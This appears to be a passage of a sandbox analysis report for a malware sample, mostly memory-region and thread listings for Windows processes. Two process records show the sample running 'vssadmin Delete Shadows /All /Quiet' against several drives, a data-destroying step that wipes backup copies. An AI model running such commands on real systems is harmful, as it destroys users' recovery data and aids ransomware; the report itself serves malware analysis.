	          end_va = 0x1e2a2a81fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e2a2a80000"
	        filename = ""

Region:
	              id = 3741
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 3742
	        start_va = 0x1e2a2a90000
	          end_va = 0x1e2a2a90fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 3743
	        start_va = 0x1e2a2aa0000
	          end_va = 0x1e2a2aa1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e2a2aa0000"
	        filename = ""


Thread:
	id = 284
	os_tid = 0x13c0


Thread:
	id = 286
	os_tid = 0x124c


Thread:
	id = 287
	os_tid = 0x13a0


Thread:
	id = 289
	os_tid = 0x13ac


Process:
	id = "49"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x2df2d000"
	os_pid = "0x1344"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "44"
	os_parent_pid = "0xc9c"
	cmd_line = "vssadmin  Delete Shadows /For=O: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 3722
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 3723
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 3724
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 3725
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 3726
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 3727
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 3728
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 3729
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 3730
	        start_va = 0x6d0000
	          end_va = 0x6d1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006d0000"
	        filename = ""

Region:
	              id = 3731
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 3732
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 3733
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 3734
	        start_va = 0x7eb40000
	          end_va = 0x7eb62fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007eb40000"
	        filename = ""

Region:
	              id = 3735
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3736
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 3737
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 3738
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 3739
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 3744
	        start_va = 0x100000
	          end_va = 0x19ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 3745
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 3746
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 3747
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3766
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 3767
	        start_va = 0x4880000
	          end_va = 0x4a9ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 3769
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3770
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 3775
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 3776
	        start_va = 0x7ea40000
	          end_va = 0x7eb3ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ea40000"
	        filename = ""

Region:
	              id = 3808
	        start_va = 0x400000
	          end_va = 0x4bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 3809
	        start_va = 0x6d0000
	          end_va = 0x6d3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006d0000"
	        filename = ""

Region:
	              id = 3810
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 3811
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 3817
	        start_va = 0x100000
	          end_va = 0x13ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 3818
	        start_va = 0x140000
	          end_va = 0x17ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000140000"
	        filename = ""

Region:
	              id = 3819
	        start_va = 0x190000
	          end_va = 0x19ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000190000"
	        filename = ""

Region:
	              id = 3820
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 3821
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 3822
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 3823
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 3824
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 3825
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 3831
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 3832
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 3833
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 3834
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 3835
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 3836
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 3851
	        start_va = 0x1a0000
	          end_va = 0x1dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001a0000"
	        filename = ""

Region:
	              id = 3852
	        start_va = 0x4c0000
	          end_va = 0x4fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004c0000"
	        filename = ""

Region:
	              id = 3853
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 3854
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 3855
	        start_va = 0x6e0000
	          end_va = 0x73ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006e0000"
	        filename = ""

Region:
	              id = 3859
	        start_va = 0x500000
	          end_va = 0x687fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000500000"
	        filename = ""

Region:
	              id = 3860
	        start_va = 0x6e0000
	          end_va = 0x709fff
	       monitored = 0
	     entry_point = 0x6e5680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 3861
	        start_va = 0x730000
	          end_va = 0x73ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000730000"
	        filename = ""

Region:
	              id = 3862
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 3863
	        start_va = 0x6e0000
	          end_va = 0x6ecfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 3864
	        start_va = 0x4aa0000
	          end_va = 0x4c20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004aa0000"
	        filename = ""

Region:
	              id = 3865
	        start_va = 0x4c30000
	          end_va = 0x602ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004c30000"
	        filename = ""

Region:
	              id = 3875
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 3876
	        start_va = 0x180000
	          end_va = 0x180fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000180000"
	        filename = ""

Region:
	              id = 3877
	        start_va = 0x6f0000
	          end_va = 0x6f3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006f0000"
	        filename = ""

Region:
	              id = 3878
	        start_va = 0x740000
	          end_va = 0x829fff
	       monitored = 0
	     entry_point = 0x77d650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 3883
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 4115
	        start_va = 0x700000
	          end_va = 0x700fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000700000"
	        filename = ""

Region:
	              id = 4116
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 4117
	        start_va = 0x710000
	          end_va = 0x710fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000710000"
	        filename = ""

Region:
	              id = 4302
	        start_va = 0x690000
	          end_va = 0x6cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000690000"
	        filename = ""

Region:
	              id = 4303
	        start_va = 0x740000
	          end_va = 0x77ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000740000"
	        filename = ""

Region:
	              id = 4312
	        start_va = 0x780000
	          end_va = 0x7bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000780000"
	        filename = ""

Region:
	              id = 4313
	        start_va = 0x7c0000
	          end_va = 0x7fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007c0000"
	        filename = ""

Region:
	              id = 4314
	        start_va = 0x800000
	          end_va = 0x83ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000800000"
	        filename = ""

Region:
	              id = 4315
	        start_va = 0x4880000
	          end_va = 0x48bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 4316
	        start_va = 0x49a0000
	          end_va = 0x4a9ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000049a0000"
	        filename = ""

Region:
	              id = 4416
	        start_va = 0x48c0000
	          end_va = 0x499ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 4424
	        start_va = 0x6030000
	          end_va = 0x60affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006030000"
	        filename = ""

Region:
	              id = 4425
	        start_va = 0x720000
	          end_va = 0x728fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 290
	os_tid = 0x13a4


Thread:
	id = 298
	os_tid = 0x1364


Thread:
	id = 300
	os_tid = 0x13e8


Thread:
	id = 324
	os_tid = 0x7f0


Thread:
	id = 326
	os_tid = 0x314


Thread:
	id = 327
	os_tid = 0x348


Process:
	id = "50"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x2de1b000"
	os_pid = "0xa2c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=M: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 3748
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 3749
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 3750
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 3751
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 3752
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 3753
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 3754
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 3755
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 3756
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 3757
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 3758
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 3759
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 3760
	        start_va = 0x7f180000
	          end_va = 0x7f1a2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f180000"
	        filename = ""

Region:
	              id = 3761
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3762
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 3763
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 3764
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 3765
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 3768
	        start_va = 0x4600000
	          end_va = 0x474ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 3771
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 3772
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 3777
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3778
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 3779
	        start_va = 0x4750000
	          end_va = 0x499ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004750000"
	        filename = ""

Region:
	              id = 3792
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3793
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 3794
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 3795
	        start_va = 0x7f080000
	          end_va = 0x7f17ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f080000"
	        filename = ""

Region:
	              id = 4039
	        start_va = 0x1c0000
	          end_va = 0x27dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4040
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 4041
	        start_va = 0x280000
	          end_va = 0x2bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000280000"
	        filename = ""

Region:
	              id = 4042
	        start_va = 0x4600000
	          end_va = 0x46fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 4043
	        start_va = 0x4740000
	          end_va = 0x474ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
